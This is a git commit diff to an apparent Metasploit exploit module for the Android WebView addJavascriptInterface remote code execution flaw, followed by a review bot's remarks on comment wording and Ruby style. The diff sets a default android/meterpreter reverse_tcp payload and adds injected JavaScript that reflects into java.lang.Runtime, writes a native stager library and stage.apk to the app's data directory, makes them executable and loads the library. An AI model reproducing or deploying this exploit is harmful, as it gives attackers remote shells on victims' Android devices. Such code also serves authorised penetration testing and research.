native jni stager
parent
4f31eba7f4
commit
c76924e946
|
@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
|
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
|
||||||
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
|
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
|
||||||
],
|
],
|
||||||
'Platform' => 'linux',
|
'Platform' => 'android',
|
||||||
'Arch' => ARCH_ARMLE,
|
'Arch' => ARCH_DALVIK,
|
||||||
'DefaultOptions' => { 'PrependFork' => true },
|
'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', },
|
||||||
'Targets' => [ [ 'Automatic', {} ] ],
|
'Targets' => [ [ 'Automatic', {} ] ],
|
||||||
'DisclosureDate' => 'Dec 21 2012',
|
'DisclosureDate' => 'Dec 21 2012',
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
send_response_html(cli, html)
|
send_response_html(cli, html)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def dalvikstager()
|
||||||
|
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so')
|
||||||
|
data = File.read(localfile, {:mode => 'rb'})
|
||||||
|
data
|
||||||
|
end
|
||||||
|
|
||||||
def js
|
def js
|
||||||
%Q|
|
%Q|
|
||||||
function exec(obj) {
|
function exec(obj) {
|
||||||
|
@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
// get the runtime so we can exec
|
// get the runtime so we can exec
|
||||||
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
|
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
|
||||||
var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
|
var runtime = m.invoke(null, null);
|
||||||
|
var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
|
||||||
|
var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}";
|
||||||
|
|
||||||
// get the process name, which will give us our data path
|
// get the process name, which will give us our data path
|
||||||
var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
|
var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
|
||||||
var ch, path = '/data/data/';
|
var ch, path = '/data/data/';
|
||||||
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
|
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
|
||||||
path += '/#{Rex::Text.rand_text_alpha(8)}';
|
var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
|
||||||
|
var stagePath = path + '/stage.apk';
|
||||||
|
|
||||||
// build the binary, chmod it, and execute it
|
// build the library and chmod it
|
||||||
m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
|
runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
|
||||||
m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
|
runtime.exec(['chmod', '700', libraryPath]).waitFor();
|
||||||
m.invoke(null, null).exec([path]);
|
|
||||||
|
// build the stage, chmod it, and load it
|
||||||
|
runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
|
||||||
|
runtime.exec(['chmod', '700', stagePath]).waitFor();
|
||||||
|
|
||||||
|
runtime.load(libraryPath);
|
||||||
|
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
|
|
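Review bot: The comment `// build the stage, chmod it, and load it` above the stagePath block is inaccurate: the lines under it only write and chmod stage.apk, and the only load in the function is `runtime.load(libraryPath)`, which loads the native library, not the stage. Presumably the library reads stage.apk from the same data directory once loaded, but that hand-off is invisible here, so the comment should say what the JS itself does, e.g. `// write the stage next to the library; the loaded library is expected to pick it up` and, above the load, `// load the JNI library; execution continues there`. The same hand-off would be worth a one-line comment on the new `dalvikstager` helper in the earlier hunk, which could also drop the empty parens and replace `File.read(localfile, {:mode => 'rb'})` with `File.binread(localfile)`. The enclosing `js` method and the `%Q|` literal it returns start in the earlier hunk, outside this one.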